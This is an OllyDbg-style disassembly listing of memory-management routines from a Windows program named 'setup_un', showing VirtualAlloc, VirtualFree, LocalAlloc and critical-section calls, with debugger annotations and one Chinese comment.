004013CB |. 8B03 MOV EAX,DWORD PTR DS:[EBX] ; |
004013CD |. 50 PUSH EAX ; |Address
004013CE |. E8 D9FDFFFF CALL <JMP.&kernel32.VirtualFree> ; \VirtualFree
004013D3 |. 33C0 XOR EAX,EAX
004013D5 |. 8903 MOV DWORD PTR DS:[EBX],EAX
004013D7 |> 5F POP EDI
004013D8 |. 5E POP ESI
004013D9 |. 5B POP EBX
004013DA \. C3 RETN
004013DB 90 NOP
004013DC /$ 53 PUSH EBX
004013DD |. 56 PUSH ESI
004013DE |. 57 PUSH EDI
004013DF |. 55 PUSH EBP
004013E0 |. 8BD9 MOV EBX,ECX
004013E2 |. 8BF2 MOV ESI,EDX
004013E4 |. 8BE8 MOV EBP,EAX
004013E6 |. C743 04 00001>MOV DWORD PTR DS:[EBX+4],100000
004013ED |. 6A 04 PUSH 4 ; /Protect = PAGE_READWRITE
004013EF |. 68 00200000 PUSH 2000 ; |AllocationType = MEM_RESERVE
004013F4 |. 68 00001000 PUSH 100000 ; |Size = 100000 (1048576.)
004013F9 |. 55 PUSH EBP ; |Address
004013FA |. E8 A5FDFFFF CALL <JMP.&kernel32.VirtualAlloc> ; \VirtualAlloc
004013FF |. 8BF8 MOV EDI,EAX
00401401 |. 893B MOV DWORD PTR DS:[EBX],EDI
00401403 |. 85FF TEST EDI,EDI
00401405 |. 75 1F JNZ SHORT setup_un.00401426
00401407 |. 81C6 FFFF0000 ADD ESI,0FFFF
0040140D |. 81E6 0000FFFF AND ESI,FFFF0000
00401413 |. 8973 04 MOV DWORD PTR DS:[EBX+4],ESI
00401416 |. 6A 04 PUSH 4 ; /Protect = PAGE_READWRITE
00401418 |. 68 00200000 PUSH 2000 ; |AllocationType = MEM_RESERVE
0040141D |. 56 PUSH ESI ; |Size
0040141E |. 55 PUSH EBP ; |Address
0040141F |. E8 80FDFFFF CALL <JMP.&kernel32.VirtualAlloc> ; \VirtualAlloc
00401424 |. 8903 MOV DWORD PTR DS:[EBX],EAX
00401426 |> 833B 00 CMP DWORD PTR DS:[EBX],0
00401429 |. 74 23 JE SHORT setup_un.0040144E
0040142B |. 8BD3 MOV EDX,EBX
0040142D |. B8 D4F54000 MOV EAX,setup_un.0040F5D4
00401432 |. E8 F5FDFFFF CALL setup_un.0040122C
00401437 |. 84C0 TEST AL,AL
00401439 |. 75 13 JNZ SHORT setup_un.0040144E
0040143B |. 68 00800000 PUSH 8000 ; /FreeType = MEM_RELEASE
00401440 |. 6A 00 PUSH 0 ; |Size = 0
00401442 |. 8B03 MOV EAX,DWORD PTR DS:[EBX] ; |
00401444 |. 50 PUSH EAX ; |Address
00401445 |. E8 62FDFFFF CALL <JMP.&kernel32.VirtualFree> ; \VirtualFree
0040144A |. 33C0 XOR EAX,EAX
0040144C |. 8903 MOV DWORD PTR DS:[EBX],EAX
0040144E |> 5D POP EBP
0040144F |. 5F POP EDI
00401450 |. 5E POP ESI
00401451 |. 5B POP EBX
00401452 \. C3 RETN
00401453 90 NOP
00401454 /$ 53 PUSH EBX
00401455 |. 56 PUSH ESI
00401456 |. 57 PUSH EDI
00401457 |. 55 PUSH EBP
00401458 |. 83C4 EC ADD ESP,-14
0040145B |. 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX
0040145F |. 891424 MOV DWORD PTR SS:[ESP],EDX
00401462 |. C74424 08 FFF>MOV DWORD PTR SS:[ESP+8],-1
0040146A |. 33D2 XOR EDX,EDX
0040146C |. 895424 0C MOV DWORD PTR SS:[ESP+C],EDX
00401470 |. 8BE8 MOV EBP,EAX
00401472 |. 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00401475 |. 03C5 ADD EAX,EBP
00401477 |. 894424 10 MOV DWORD PTR SS:[ESP+10],EAX
0040147B |. 8B1D D4F54000 MOV EBX,DWORD PTR DS:[40F5D4]
00401481 |. EB 51 JMP SHORT setup_un.004014D4
00401483 |> 8B3B /MOV EDI,DWORD PTR DS:[EBX]
00401485 |. 8B73 08 |MOV ESI,DWORD PTR DS:[EBX+8]
00401488 |. 3BEE |CMP EBP,ESI
0040148A |. 77 46 |JA SHORT setup_un.004014D2
0040148C |. 8BC6 |MOV EAX,ESI
0040148E |. 0343 0C |ADD EAX,DWORD PTR DS:[EBX+C]
00401491 |. 3B4424 10 |CMP EAX,DWORD PTR SS:[ESP+10]
00401495 |. 77 3B |JA SHORT setup_un.004014D2
00401497 |. 3B7424 08 |CMP ESI,DWORD PTR SS:[ESP+8]
0040149B |. 73 04 |JNB SHORT setup_un.004014A1
0040149D |. 897424 08 |MOV DWORD PTR SS:[ESP+8],ESI
004014A1 |> 8BC6 |MOV EAX,ESI
004014A3 |. 0343 0C |ADD EAX,DWORD PTR DS:[EBX+C]
004014A6 |. 3B4424 0C |CMP EAX,DWORD PTR SS:[ESP+C]
004014AA |. 76 04 |JBE SHORT setup_un.004014B0
004014AC |. 894424 0C |MOV DWORD PTR SS:[ESP+C],EAX
004014B0 |> 68 00800000 |PUSH 8000 ; /FreeType = MEM_RELEASE
004014B5 |. 6A 00 |PUSH 0 ; |Size = 0
004014B7 |. 56 |PUSH ESI ; |Address
004014B8 |. E8 EFFCFFFF |CALL <JMP.&kernel32.VirtualFree> ; \VirtualFree
004014BD |. 85C0 |TEST EAX,EAX
004014BF |. 75 0A |JNZ SHORT setup_un.004014CB
004014C1 |. C705 B0F54000>|MOV DWORD PTR DS:[40F5B0],1
004014CB |> 8BC3 |MOV EAX,EBX
004014CD |. E8 8AFDFFFF |CALL setup_un.0040125C
004014D2 |> 8BDF |MOV EBX,EDI
004014D4 |> 81FB D4F54000 CMP EBX,setup_un.0040F5D4
004014DA |.^ 75 A7 \JNZ SHORT setup_un.00401483
004014DC |. 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
004014E0 |. 33D2 XOR EDX,EDX
004014E2 |. 8910 MOV DWORD PTR DS:[EAX],EDX
004014E4 |. 837C24 0C 00 CMP DWORD PTR SS:[ESP+C],0
004014E9 |. 74 19 JE SHORT setup_un.00401504
004014EB |. 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
004014EF |. 8B5424 08 MOV EDX,DWORD PTR SS:[ESP+8]
004014F3 |. 8910 MOV DWORD PTR DS:[EAX],EDX
004014F5 |. 8B4424 0C MOV EAX,DWORD PTR SS:[ESP+C]
004014F9 |. 2B4424 08 SUB EAX,DWORD PTR SS:[ESP+8]
004014FD |. 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]
00401501 |. 8942 04 MOV DWORD PTR DS:[EDX+4],EAX
00401504 |> 83C4 14 ADD ESP,14
00401507 |. 5D POP EBP
00401508 |. 5F POP EDI
00401509 |. 5E POP ESI
0040150A |. 5B POP EBX
0040150B \. C3 RETN
0040150C /$ 53 PUSH EBX
0040150D |. 56 PUSH ESI
0040150E |. 57 PUSH EDI
0040150F |. 55 PUSH EBP
00401510 |. 83C4 F4 ADD ESP,-0C
00401513 |. 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX
00401517 |. 891424 MOV DWORD PTR SS:[ESP],EDX
0040151A |. 8BD0 MOV EDX,EAX
0040151C |. 8BEA MOV EBP,EDX
0040151E |. 81E5 00F0FFFF AND EBP,FFFFF000
00401524 |. 031424 ADD EDX,DWORD PTR SS:[ESP]
00401527 |. 81C2 FF0F0000 ADD EDX,0FFF
0040152D |. 81E2 00F0FFFF AND EDX,FFFFF000
00401533 |. 895424 08 MOV DWORD PTR SS:[ESP+8],EDX
00401537 |. 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
0040153B |. 8928 MOV DWORD PTR DS:[EAX],EBP
0040153D |. 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8]
00401541 |. 2BC5 SUB EAX,EBP
00401543 |. 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]
00401547 |. 8942 04 MOV DWORD PTR DS:[EDX+4],EAX
0040154A |. 8B35 D4F54000 MOV ESI,DWORD PTR DS:[40F5D4]
00401550 |. EB 3C JMP SHORT setup_un.0040158E
00401552 |> 8B5E 08 /MOV EBX,DWORD PTR DS:[ESI+8]
00401555 |. 8B7E 0C |MOV EDI,DWORD PTR DS:[ESI+C]
00401558 |. 03FB |ADD EDI,EBX
0040155A |. 3BEB |CMP EBP,EBX
0040155C |. 76 02 |JBE SHORT setup_un.00401560
0040155E |. 8BDD |MOV EBX,EBP
00401560 |> 3B7C24 08 |CMP EDI,DWORD PTR SS:[ESP+8]
00401564 |. 76 04 |JBE SHORT setup_un.0040156A
00401566 |. 8B7C24 08 |MOV EDI,DWORD PTR SS:[ESP+8]
0040156A |> 3BFB |CMP EDI,EBX
0040156C |. 76 1E |JBE SHORT setup_un.0040158C
0040156E |. 6A 04 |PUSH 4 ; /Protect = PAGE_READWRITE
00401570 |. 68 00100000 |PUSH 1000 ; |AllocationType = MEM_COMMIT
00401575 |. 2BFB |SUB EDI,EBX ; |
00401577 |. 57 |PUSH EDI ; |Size
00401578 |. 53 |PUSH EBX ; |Address
00401579 |. E8 26FCFFFF |CALL <JMP.&kernel32.VirtualAlloc> ; \VirtualAlloc
0040157E |. 85C0 |TEST EAX,EAX
00401580 |. 75 0A |JNZ SHORT setup_un.0040158C
00401582 |. 8B4424 04 |MOV EAX,DWORD PTR SS:[ESP+4]
00401586 |. 33D2 |XOR EDX,EDX
00401588 |. 8910 |MOV DWORD PTR DS:[EAX],EDX
0040158A |. EB 0A |JMP SHORT setup_un.00401596
0040158C |> 8B36 |MOV ESI,DWORD PTR DS:[ESI]
0040158E |> 81FE D4F54000 CMP ESI,setup_un.0040F5D4
00401594 |.^ 75 BC \JNZ SHORT setup_un.00401552
00401596 |> 83C4 0C ADD ESP,0C
00401599 |. 5D POP EBP
0040159A |. 5F POP EDI
0040159B |. 5E POP ESI
0040159C |. 5B POP EBX
0040159D \. C3 RETN
0040159E 8BC0 MOV EAX,EAX
004015A0 /$ 53 PUSH EBX
004015A1 |. 56 PUSH ESI
004015A2 |. 57 PUSH EDI
004015A3 |. 55 PUSH EBP
004015A4 |. 51 PUSH ECX
004015A5 |. 8BD8 MOV EBX,EAX
004015A7 |. 8BF3 MOV ESI,EBX
004015A9 |. 81C6 FF0F0000 ADD ESI,0FFF
004015AF |. 81E6 00F0FFFF AND ESI,FFFFF000
004015B5 |. 893424 MOV DWORD PTR SS:[ESP],ESI
004015B8 |. 8BEB MOV EBP,EBX
004015BA |. 03EA ADD EBP,EDX
004015BC |. 81E5 00F0FFFF AND EBP,FFFFF000
004015C2 |. 8B0424 MOV EAX,DWORD PTR SS:[ESP]
004015C5 |. 8901 MOV DWORD PTR DS:[ECX],EAX
004015C7 |. 8BC5 MOV EAX,EBP
004015C9 |. 2B0424 SUB EAX,DWORD PTR SS:[ESP]
004015CC |. 8941 04 MOV DWORD PTR DS:[ECX+4],EAX
004015CF |. 8B35 D4F54000 MOV ESI,DWORD PTR DS:[40F5D4]
004015D5 |. EB 38 JMP SHORT setup_un.0040160F
004015D7 |> 8B5E 08 /MOV EBX,DWORD PTR DS:[ESI+8]
004015DA |. 8B7E 0C |MOV EDI,DWORD PTR DS:[ESI+C]
004015DD |. 03FB |ADD EDI,EBX
004015DF |. 3B1C24 |CMP EBX,DWORD PTR SS:[ESP]
004015E2 |. 73 03 |JNB SHORT setup_un.004015E7
004015E4 |. 8B1C24 |MOV EBX,DWORD PTR SS:[ESP]
004015E7 |> 3BEF |CMP EBP,EDI
004015E9 |. 73 02 |JNB SHORT setup_un.004015ED
004015EB |. 8BFD |MOV EDI,EBP
004015ED |> 3BFB |CMP EDI,EBX
004015EF |. 76 1C |JBE SHORT setup_un.0040160D
004015F1 |. 68 00400000 |PUSH 4000 ; /FreeType = MEM_DECOMMIT
004015F6 |. 2BFB |SUB EDI,EBX ; |
004015F8 |. 57 |PUSH EDI ; |Size
004015F9 |. 53 |PUSH EBX ; |Address
004015FA |. E8 ADFBFFFF |CALL <JMP.&kernel32.VirtualFree> ; \VirtualFree
004015FF |. 85C0 |TEST EAX,EAX
00401601 |. 75 0A |JNZ SHORT setup_un.0040160D
00401603 |. C705 B0F54000>|MOV DWORD PTR DS:[40F5B0],2
0040160D |> 8B36 |MOV ESI,DWORD PTR DS:[ESI]
0040160F |> 81FE D4F54000 CMP ESI,setup_un.0040F5D4
00401615 |.^ 75 C0 \JNZ SHORT setup_un.004015D7
00401617 |. 5A POP EDX
00401618 |. 5D POP EBP
00401619 |. 5F POP EDI
0040161A |. 5E POP ESI
0040161B |. 5B POP EBX
0040161C \. C3 RETN
0040161D 8D40 00 LEA EAX,DWORD PTR DS:[EAX]
00401620 /$ 53 PUSH EBX
00401621 |. 56 PUSH ESI
00401622 |. 57 PUSH EDI
00401623 |. 55 PUSH EBP
00401624 |. 83C4 F8 ADD ESP,-8
00401627 |. 8BF2 MOV ESI,EDX
00401629 |. 8BF8 MOV EDI,EAX
0040162B |. BD E4F54000 MOV EBP,setup_un.0040F5E4
00401630 |. 81C7 FF3F0000 ADD EDI,3FFF
00401636 |. 81E7 00C0FFFF AND EDI,FFFFC000
0040163C |> 8B5D 00 /MOV EBX,DWORD PTR SS:[EBP]
0040163F |. EB 33 |JMP SHORT setup_un.00401674
00401641 |> 3B7B 0C |/CMP EDI,DWORD PTR DS:[EBX+C]
00401644 |. 7F 2C ||JG SHORT setup_un.00401672
00401646 |. 8BCE ||MOV ECX,ESI
00401648 |. 8BD7 ||MOV EDX,EDI
0040164A |. 8B43 08 ||MOV EAX,DWORD PTR DS:[EBX+8]
0040164D |. E8 BAFEFFFF ||CALL setup_un.0040150C
00401652 |. 833E 00 ||CMP DWORD PTR DS:[ESI],0
00401655 |. 74 50 ||JE SHORT setup_un.004016A7
00401657 |. 8B46 04 ||MOV EAX,DWORD PTR DS:[ESI+4]
0040165A |. 0143 08 ||ADD DWORD PTR DS:[EBX+8],EAX
0040165D |. 8B46 04 ||MOV EAX,DWORD PTR DS:[ESI+4]
00401660 |. 2943 0C ||SUB DWORD PTR DS:[EBX+C],EAX
00401663 |. 837B 0C 00 ||CMP DWORD PTR DS:[EBX+C],0
00401667 |. 75 3E ||JNZ SHORT setup_un.004016A7
00401669 |. 8BC3 ||MOV EAX,EBX
0040166B |. E8 ECFBFFFF ||CALL setup_un.0040125C
00401670 |. EB 35 ||JMP SHORT setup_un.004016A7
00401672 |> 8B1B ||MOV EBX,DWORD PTR DS:[EBX]
00401674 |> 3BDD | CMP EBX,EBP
00401676 |.^ 75 C9 |\JNZ SHORT setup_un.00401641
00401678 |. 8BD6 |MOV EDX,ESI
0040167A |. 8BC7 |MOV EAX,EDI
0040167C |. E8 F7FCFFFF |CALL setup_un.00401378
00401681 |. 833E 00 |CMP DWORD PTR DS:[ESI],0
00401684 |. 74 21 |JE SHORT setup_un.004016A7
00401686 |. 8BCC |MOV ECX,ESP
00401688 |. 8BD6 |MOV EDX,ESI
0040168A |. 8BC5 |MOV EAX,EBP
0040168C |. E8 E3FBFFFF |CALL setup_un.00401274
00401691 |. 833C24 00 |CMP DWORD PTR SS:[ESP],0
00401695 |.^ 75 A5 \JNZ SHORT setup_un.0040163C
00401697 |. 8BCC MOV ECX,ESP
00401699 |. 8B56 04 MOV EDX,DWORD PTR DS:[ESI+4]
0040169C |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
0040169E |. E8 B1FDFFFF CALL setup_un.00401454
004016A3 |. 33C0 XOR EAX,EAX
004016A5 |. 8906 MOV DWORD PTR DS:[ESI],EAX
004016A7 |> 59 POP ECX
004016A8 |. 5A POP EDX
004016A9 |. 5D POP EBP
004016AA |. 5F POP EDI
004016AB |. 5E POP ESI
004016AC |. 5B POP EBX
004016AD \. C3 RETN
004016AE 8BC0 MOV EAX,EAX
004016B0 /$ 53 PUSH EBX
004016B1 |. 56 PUSH ESI
004016B2 |. 57 PUSH EDI
004016B3 |. 55 PUSH EBP
004016B4 |. 83C4 EC ADD ESP,-14
004016B7 |. 890C24 MOV DWORD PTR SS:[ESP],ECX
004016BA |. 8BFA MOV EDI,EDX
004016BC |. 8BF0 MOV ESI,EAX
004016BE |. BD E4F54000 MOV EBP,setup_un.0040F5E4
004016C3 |. 81C7 FF3F0000 ADD EDI,3FFF
004016C9 |. 81E7 00C0FFFF AND EDI,FFFFC000
004016CF |> 8B5D 00 /MOV EBX,DWORD PTR SS:[EBP]
004016D2 |. EB 02 |JMP SHORT setup_un.004016D6
004016D4 |> 8B1B |/MOV EBX,DWORD PTR DS:[EBX]
004016D6 |> 3BDD | CMP EBX,EBP
004016D8 |. 74 05 ||JE SHORT setup_un.004016DF
004016DA |. 3B73 08 ||CMP ESI,DWORD PTR DS:[EBX+8]
004016DD |.^ 75 F5 |\JNZ SHORT setup_un.004016D4
004016DF |> 3B73 08 |CMP ESI,DWORD PTR DS:[EBX+8]
004016E2 |. 75 57 |JNZ SHORT setup_un.0040173B
004016E4 |. 3B7B 0C |CMP EDI,DWORD PTR DS:[EBX+C]
004016E7 |. 0F8E 96000000 |JLE setup_un.00401783
004016ED |. 8D4C24 04 |LEA ECX,DWORD PTR SS:[ESP+4]
004016F1 |. 8BD7 |MOV EDX,EDI
004016F3 |. 2B53 0C |SUB EDX,DWORD PTR DS:[EBX+C]
004016F6 |. 8B43 08 |MOV EAX,DWORD PTR DS:[EBX+8]
004016F9 |. 0343 0C |ADD EAX,DWORD PTR DS:[EBX+C]
004016FC |. E8 DBFCFFFF |CALL setup_un.004013DC
00401701 |. 837C24 04 00 |CMP DWORD PTR SS:[ESP+4],0
00401706 |. 74 33 |JE SHORT setup_un.0040173B
00401708 |. 8D4C24 0C |LEA ECX,DWORD PTR SS:[ESP+C]
0040170C |. 8D5424 04 |LEA EDX,DWORD PTR SS:[ESP+4]
00401710 |. 8BC5 |MOV EAX,EBP
00401712 |. E8 5DFBFFFF |CALL setup_un.00401274
00401717 |. 837C24 0C 00 |CMP DWORD PTR SS:[ESP+C],0
0040171C |.^ 75 B1 |JNZ SHORT setup_un.004016CF
0040171E |. 8D4C24 0C |LEA ECX,DWORD PTR SS:[ESP+C]
00401722 |. 8B5424 08 |MOV EDX,DWORD PTR SS:[ESP+8]
00401726 |. 8B4424 04 |MOV EAX,DWORD PTR SS:[ESP+4]
0040172A |. E8 25FDFFFF |CALL setup_un.00401454
0040172F |. 8B0424 |MOV EAX,DWORD PTR SS:[ESP]
00401732 |. 33D2 |XOR EDX,EDX
00401734 |. 8910 |MOV DWORD PTR DS:[EAX],EDX
00401736 |. E9 90000000 |JMP setup_un.004017CB
0040173B |> 8D4C24 04 |LEA ECX,DWORD PTR SS:[ESP+4]
0040173F |. 8BD7 |MOV EDX,EDI
00401741 |. 8BC6 |MOV EAX,ESI
00401743 |. E8 94FCFFFF |CALL setup_un.004013DC
00401748 |. 837C24 04 00 |CMP DWORD PTR SS:[ESP+4],0
0040174D |. 74 34 |JE SHORT setup_un.00401783
0040174F |. 8D4C24 0C |LEA ECX,DWORD PTR SS:[ESP+C]
00401753 |. 8D5424 04 |LEA EDX,DWORD PTR SS:[ESP+4]
00401757 |. 8BC5 |MOV EAX,EBP
00401759 |. E8 16FBFFFF |CALL setup_un.00401274
0040175E |. 837C24 0C 00 |CMP DWORD PTR SS:[ESP+C],0
00401763 |.^ 0F85 66FFFFFF \JNZ setup_un.004016CF
00401769 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
0040176D |. 8B5424 08 MOV EDX,DWORD PTR SS:[ESP+8]
00401771 |. 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
00401775 |. E8 DAFCFFFF CALL setup_un.00401454
0040177A |. 8B0424 MOV EAX,DWORD PTR SS:[ESP]
0040177D |. 33D2 XOR EDX,EDX
0040177F |. 8910 MOV DWORD PTR DS:[EAX],EDX
00401781 |. EB 48 JMP SHORT setup_un.004017CB
00401783 |> 8B6B 08 MOV EBP,DWORD PTR DS:[EBX+8]
00401786 |. 3BF5 CMP ESI,EBP
00401788 |. 75 3A JNZ SHORT setup_un.004017C4
0040178A |. 3B7B 0C CMP EDI,DWORD PTR DS:[EBX+C]
0040178D |. 7F 35 JG SHORT setup_un.004017C4
0040178F |. 8B0C24 MOV ECX,DWORD PTR SS:[ESP]
00401792 |. 8BD7 MOV EDX,EDI
00401794 |. 8BC5 MOV EAX,EBP
00401796 |. E8 71FDFFFF CALL setup_un.0040150C
0040179B |. 8B0424 MOV EAX,DWORD PTR SS:[ESP]
0040179E |. 8338 00 CMP DWORD PTR DS:[EAX],0
004017A1 |. 74 28 JE SHORT setup_un.004017CB
004017A3 |. 8B0424 MOV EAX,DWORD PTR SS:[ESP]
004017A6 |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]
004017A9 |. 0143 08 ADD DWORD PTR DS:[EBX+8],EAX
004017AC |. 8B0424 MOV EAX,DWORD PTR SS:[ESP]
004017AF |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]
004017B2 |. 2943 0C SUB DWORD PTR DS:[EBX+C],EAX
004017B5 |. 837B 0C 00 CMP DWORD PTR DS:[EBX+C],0
004017B9 |. 75 10 JNZ SHORT setup_un.004017CB
004017BB |. 8BC3 MOV EAX,EBX
004017BD |. E8 9AFAFFFF CALL setup_un.0040125C
004017C2 |. EB 07 JMP SHORT setup_un.004017CB
004017C4 |> 8B0424 MOV EAX,DWORD PTR SS:[ESP]
004017C7 |. 33D2 XOR EDX,EDX
004017C9 |. 8910 MOV DWORD PTR DS:[EAX],EDX
004017CB |> 83C4 14 ADD ESP,14
004017CE |. 5D POP EBP
004017CF |. 5F POP EDI
004017D0 |. 5E POP ESI
004017D1 |. 5B POP EBX
004017D2 \. C3 RETN
004017D3 90 NOP
004017D4 /$ 53 PUSH EBX
004017D5 |. 56 PUSH ESI
004017D6 |. 57 PUSH EDI
004017D7 |. 83C4 EC ADD ESP,-14
004017DA |. 8BF9 MOV EDI,ECX
004017DC |. 891424 MOV DWORD PTR SS:[ESP],EDX
004017DF |. 8D98 FF3F0000 LEA EBX,DWORD PTR DS:[EAX+3FFF]
004017E5 |. 81E3 00C0FFFF AND EBX,FFFFC000
004017EB |. 8B3424 MOV ESI,DWORD PTR SS:[ESP]
004017EE |. 03F0 ADD ESI,EAX
004017F0 |. 81E6 00C0FFFF AND ESI,FFFFC000
004017F6 |. 3BDE CMP EBX,ESI
004017F8 |. 73 5B JNB SHORT setup_un.00401855
004017FA |. 8BCF MOV ECX,EDI
004017FC |. 8BD6 MOV EDX,ESI
004017FE |. 2BD3 SUB EDX,EBX
00401800 |. 8BC3 MOV EAX,EBX
00401802 |. E8 99FDFFFF CALL setup_un.004015A0
00401807 |. 8D4C24 04 LEA ECX,DWORD PTR SS:[ESP+4]
0040180B |. 8BD7 MOV EDX,EDI
0040180D |. B8 E4F54000 MOV EAX,setup_un.0040F5E4
00401812 |. E8 5DFAFFFF CALL setup_un.00401274
00401817 |. 8B5C24 04 MOV EBX,DWORD PTR SS:[ESP+4]
0040181B |. 85DB TEST EBX,EBX
0040181D |. 74 1F JE SHORT setup_un.0040183E
0040181F |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
00401823 |. 8B5424 08 MOV EDX,DWORD PTR SS:[ESP+8]
00401827 |. 8BC3 MOV EAX,EBX
00401829 |. E8 26FCFFFF CALL setup_un.00401454
0040182E |. 8B4424 0C MOV EAX,DWORD PTR SS:[ESP+C]
00401832 |. 894424 04 MOV DWORD PTR SS:[ESP+4],EAX
00401836 |. 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10]
0040183A |. 894424 08 MOV DWORD PTR SS:[ESP+8],EAX
0040183E |> 837C24 04 00 CMP DWORD PTR SS:[ESP+4],0
00401843 |. 74 14 JE SHORT setup_un.00401859
00401845 |. 8D5424 04 LEA EDX,DWORD PTR SS:[ESP+4]
00401849 |. B8 E4F54000 MOV EAX,setup_un.0040F5E4
0040184E |. E8 91FAFFFF CALL setup_un.004012E4
00401853 |. EB 04 JMP SHORT setup_un.00401859
00401855 |> 33C0 XOR EAX,EAX
00401857 |. 8907 MOV DWORD PTR DS:[EDI],EAX
00401859 |> 83C4 14 ADD ESP,14
0040185C |. 5F POP EDI
0040185D |. 5E POP ESI
0040185E |. 5B POP EBX
0040185F \. C3 RETN
00401860 $ 55 PUSH EBP
00401861 . 8BEC MOV EBP,ESP
00401863 . 33D2 XOR EDX,EDX
00401865 . 55 PUSH EBP
00401866 . 68 16194000 PUSH setup_un.00401916
0040186B . 64:FF32 PUSH DWORD PTR FS:[EDX]
0040186E . 64:8922 MOV DWORD PTR FS:[EDX],ESP
00401871 . 68 B4F54000 PUSH setup_un.0040F5B4 ; /pCriticalSection = setup_un.0040F5B4
00401876 . E8 39F9FFFF CALL <JMP.&kernel32.InitializeCriticalSe>; \InitializeCriticalSection
0040187B . 803D 35F04000>CMP BYTE PTR DS:[40F035],0
00401882 . 74 0A JE SHORT setup_un.0040188E
00401884 . 68 B4F54000 PUSH setup_un.0040F5B4 ; /pCriticalSection = setup_un.0040F5B4
00401889 . E8 2EF9FFFF CALL <JMP.&kernel32.EnterCriticalSection>; \EnterCriticalSection
0040188E > B8 D4F54000 MOV EAX,setup_un.0040F5D4
00401893 . E8 8CF9FFFF CALL setup_un.00401224
00401898 . B8 E4F54000 MOV EAX,setup_un.0040F5E4
0040189D . E8 82F9FFFF CALL setup_un.00401224
004018A2 . B8 10F64000 MOV EAX,setup_un.0040F610
004018A7 . E8 78F9FFFF CALL setup_un.00401224
004018AC . 68 F80F0000 PUSH 0FF8 ; /Size = FF8 (4088.)
004018B1 . 6A 00 PUSH 0 ; |Flags = LMEM_FIXED
004018B3 . E8 DCF8FFFF CALL <JMP.&kernel32.LocalAlloc> ; \LocalAlloc
004018B8 . A3 0CF64000 MOV DWORD PTR DS:[40F60C],EAX
004018BD . 833D 0CF64000>CMP DWORD PTR DS:[40F60C],0
004018C4 . 74 2F JE SHORT setup_un.004018F5
004018C6 . B8 03000000 MOV EAX,3
004018CB > 8B15 0CF64000 MOV EDX,DWORD PTR DS:[40F60C]
004018D1 . 33C9 XOR ECX,ECX
004018D3 . 894C82 F4 MOV DWORD PTR DS:[EDX+EAX*4-C],ECX
004018D7 . 40 INC EAX
004018D8 . 3D 01040000 CMP EAX,401
004018DD .^ 75 EC JNZ SHORT setup_un.004018CB
004018DF . B8 F4F54000 MOV EAX,setup_un.0040F5F4
004018E4 . 8940 04 MOV DWORD PTR DS:[EAX+4],EAX
004018E7 . 8900 MOV DWORD PTR DS:[EAX],EAX
004018E9 . A3 00F64000 MOV DWORD PTR DS:[40F600],EAX
004018EE . C605 ACF54000>MOV BYTE PTR DS:[40F5AC],1
004018F5 > 33C0 XOR EAX,EAX
004018F7 . 5A POP EDX
004018F8 . 59 POP ECX
004018F9 . 59 POP ECX
004018FA . 64:8910 MOV DWORD PTR FS:[EAX],EDX
004018FD . 68 1D194000 PUSH setup_un.0040191D
00401902 > 803D 35F04000>CMP BYTE PTR DS:[40F035],0
00401909 . 74 0A JE SHORT setup_un.00401915
0040190B . 68 B4F54000 PUSH setup_un.0040F5B4 ; /pCriticalSection = setup_un.0040F5B4
00401910 . E8 AFF8FFFF CALL <JMP.&kernel32.LeaveCriticalSection>; \LeaveCriticalSection
00401915 > C3 RETN ; RET 用作跳转到 0040191D
00401916 . E9 491D0000 JMP setup_un.00403664
0040191B .^ EB E5 JMP SHORT setup_un.00401902
0040191D > A0 ACF54000 MOV AL,BYTE PTR DS:[40F5AC]
00401922 . 5D POP EBP
00401923 . C3 RETN
00401924 $ 55 PUSH EBP
00401925 . 8BEC MOV EBP,ESP
00401927 . 53 PUSH EBX
00401928 . 803D ACF54000>CMP BYTE PTR DS:[40F5AC],0
0040192F . 0F84 CC000000 JE setup_un.00401A01
00401935 . 33D2 XOR EDX,EDX
00401937 . 55 PUSH EBP
00401938 . 68 FA194000 PUSH setup_un.004019FA
0040193D . 64:FF32 PUSH DWORD PTR FS:[EDX]
00401940 . 64:8922 MOV DWORD PTR FS:[EDX],ESP
00401943 . 803D 35F04000>CMP BYTE PTR DS:[40F035],0
0040194A . 74 0A JE SHORT setup_un.00401956
0040194C . 68 B4F54000 PUSH setup_un.0040F5B4 ; /pCriticalSection = setup_un.0040F5B4
00401951 . E8 66F8FFFF CALL <JMP.&kernel32.EnterCriticalSection>; \EnterCriticalSection
00401956 > C605 ACF54000>MOV BYTE PTR DS:[40F5AC],0
0040195D . A1 0CF64000 MOV EAX,DWORD PTR DS:[40F60C]
00401962 . 50 PUSH EAX ; /hMemory => NULL
00401963 . E8 34F8FFFF CALL <JMP.&kernel32.LocalFree> ; \LocalFree
00401968 . 33C0 XOR EAX,EAX
0040196A . A3 0CF64000 MOV DWORD PTR DS:[40F60C],EAX
0040196F . 8B1D D4F54000 MOV EBX,DWORD PTR DS:[40F5D4]
00401975 . EB 12 JMP SHORT setup_un.00401989
00401977 > 68 00800000 PUSH 8000 ; /FreeType = MEM_RELEASE
0040197C . 6A 00 PUSH 0 ; |Size = 0
0040197E . 8B43 08 MOV EAX,DWORD PTR DS:[EBX+8] ; |
00401981 . 50 PUSH EAX ; |Address
00401982 . E8 25F8FFFF CALL <JMP.&kernel32.VirtualFree> ; \VirtualFree
00401987 . 8B1B MOV EBX,DWORD PTR DS:[EBX]
00401989 > 81FB D4F54000 CMP EBX,setup_un.0040F5D4
0040198F .^ 75 E6 JNZ SHORT setup_un.00401977
00401991 . B8 D4F54000 MOV EAX,setup_un.0040F5D4
00401996 . E8 89F8FFFF CALL setup_un.00401224
0040199B . B8 E4F54000 MOV EAX,setup_un.0040F5E4
004019A0 . E8 7FF8FFFF CALL setup_un.00401224
004019A5 . B8 10F64000 MOV EAX,setup_un.0040F610
004019AA . E8 75F8FFFF CALL setup_un.00401224
